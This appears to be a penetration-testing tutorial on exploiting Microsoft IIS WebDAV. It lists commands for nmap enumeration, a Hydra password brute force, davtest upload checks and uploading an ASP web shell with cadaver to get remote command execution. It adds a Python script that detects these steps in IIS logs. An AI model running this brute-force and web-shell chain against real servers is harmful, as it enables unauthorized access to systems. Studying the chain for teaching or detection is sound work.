# Exploiting Microsoft IIS WebDAV

## What is Microsoft IIS?

* IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.
* It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.
* IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.
* Typically configured to run on ports 80/443.
* Supported executable file extensions:
  * .asp
  * .aspx
  * .config
  * .php

## What is WebDAV?

* WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.
* WebDAV essentially enables a web server to function as a file server for collaborative authoring.
* WebDAV runs on top of Microsoft IIS on ports 80/443.
* Connecting to a WebDAV server requires legitimate credentials, because WebDAV authenticates users with a username and password.

## WebDAV Exploitation

* The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server.
* We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.
* After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

## Tools for Exploitation

* [**`davtest`**](https://github.com/cldrn/davtest) - Used to scan, authenticate to and exploit a WebDAV server.
* [**`cadaver`**](https://github.com/notroj/cadaver) - Cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

## Attack Flow for the Microsoft IIS WebDAV Server

#### 1. Identify the Target Using Nmap

**Objective:** Determine if the target web application is running Microsoft IIS WebDAV.

**Command:**

```sh
nmap -sC --script=http-enum <target>
```

**Explanation:**

* `-sC`: Use default scripts.
* `--script=http-enum`: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories.

#### 2. Brute Force Authentication Using Hydra

**Objective:** Perform a brute force attack on the `/webdav/` folder to gain authentication credentials.

**Command:**

```sh
hydra -l <user> -P <password_list> <target> http-get /webdav/
```

**Explanation:**

* `-l`: Specifies a single username to try.
* `-P`: Specifies the password list.
* `http-get`: Specifies the Hydra module (HTTP basic authentication over GET); the path that follows it, `/webdav/`, is the protected directory to target.

#### 3. Validate Upload Capabilities with Davtest

**Objective:** Confirm which file extensions can be uploaded and executed on the WebDAV server.

**Command:**

```sh
davtest -auth <user>:<pass> -url http://<target>/webdav
```

**Explanation:**

* `-auth`: Specifies the authentication credentials.
* `-url`: Specifies the URL of the WebDAV directory.

#### 4. Upload a Shell Using Cadaver

**Objective:** Use Cadaver to upload a web shell to the server.

**Command:**

```sh
cadaver http://<target>/webdav
```

**Procedure:**

1. Run the command to start Cadaver.
2. When prompted, enter the username and password obtained from the brute force attack.
3. At the `dav:/webdav/>` prompt, use the following command to upload the shell:

   ```sh
   put /usr/share/webshells/asp/webshell.asp
   ```

**Explanation:**

* `cadaver`: Command-line WebDAV client.
* `put`: Uploads the specified file to the WebDAV directory.

#### 5. Access the Web Shell

**Objective:** Gain command execution on the server through the web shell's browser-based interface.

**Steps:**

1. Navigate to the uploaded shell in your browser:

   ```bash
   http://<target>/webdav/webshell.asp
   ```
2. Use the web shell interface to execute commands on the server.
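Seen from the defender's side, each of the steps above leaves a trace in the IIS W3C log: a burst of 401 responses against `/webdav/` from the brute force, a `PUT` of a file with an executable extension from the cadaver upload, and a `GET` of that same file when the shell is opened. The Python below is an added example, not part of the original page, that flags all three over a constructed log excerpt; the field layout in the `#Fields` header and the threshold of five failures are assumptions.

```python
from collections import Counter

# Extensions the page lists as executable on IIS; a PUT of one of these into
# the WebDAV share is a high-priority event.
EXEC_EXT = (".asp", ".aspx", ".config", ".php")
BRUTE_THRESHOLD = 5   # 401s from one client IP before we call it brute force (assumed)

# Constructed IIS W3C log excerpt (not real data). Field order follows the
# #Fields header; "-" means an empty field, as IIS writes it.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus
2024-05-01 10:00:01 10.0.0.5 GET /webdav/ - 80 - 192.0.2.10 Mozilla/5.0 401 2
2024-05-01 10:00:01 10.0.0.5 GET /webdav/ - 80 - 192.0.2.10 Mozilla/5.0 401 2
2024-05-01 10:00:02 10.0.0.5 GET /webdav/ - 80 - 192.0.2.10 Mozilla/5.0 401 2
2024-05-01 10:00:02 10.0.0.5 GET /webdav/ - 80 - 192.0.2.10 Mozilla/5.0 401 2
2024-05-01 10:00:03 10.0.0.5 GET /webdav/ - 80 - 192.0.2.10 Mozilla/5.0 401 2
2024-05-01 10:00:03 10.0.0.5 GET /webdav/ - 80 bob 192.0.2.10 Mozilla/5.0 200 0
2024-05-01 10:00:09 10.0.0.5 PUT /webdav/webshell.asp - 80 bob 192.0.2.10 cadaver/0.23 201 0
2024-05-01 10:00:15 10.0.0.5 GET /webdav/webshell.asp - 80 - 192.0.2.10 Mozilla/5.0 200 0
2024-05-01 10:01:00 10.0.0.5 PUT /webdav/notes.txt - 80 alice 198.51.100.7 cadaver/0.23 201 0
"""

def parse_iis_log(text):
    """Yield one dict per request line, named by the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        yield dict(zip(fields, line.split()))

def analyse(text):
    """Return (brute_force_ips, exec_uploads, shell_hits) for the log text."""
    failed = Counter()
    uploads, hits = [], []
    rows = list(parse_iis_log(text))
    for r in rows:
        if not r["cs-uri-stem"].lower().startswith("/webdav"):
            continue
        if r["sc-status"] == "401":
            failed[r["c-ip"]] += 1
        if r["cs-method"] == "PUT" and r["cs-uri-stem"].lower().endswith(EXEC_EXT):
            uploads.append((r["c-ip"], r["cs-username"], r["cs-uri-stem"]))
    uploaded = {u[2] for u in uploads}
    for r in rows:  # second pass: any successful fetch of a file that was just uploaded
        if r["cs-method"] == "GET" and r["cs-uri-stem"] in uploaded and r["sc-status"] == "200":
            hits.append((r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"]))
    brute = sorted(ip for ip, n in failed.items() if n >= BRUTE_THRESHOLD)
    return brute, uploads, hits
```

The `.txt` upload from a second address is deliberately left unflagged, so an alert on `uploads` or `hits` points at a specific client, user and path rather than at ordinary WebDAV use.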

***

**Hacker's Mantra:** *Should we fear hackers? Intention is at the heart of this discussion.* - Kevin Mitnick
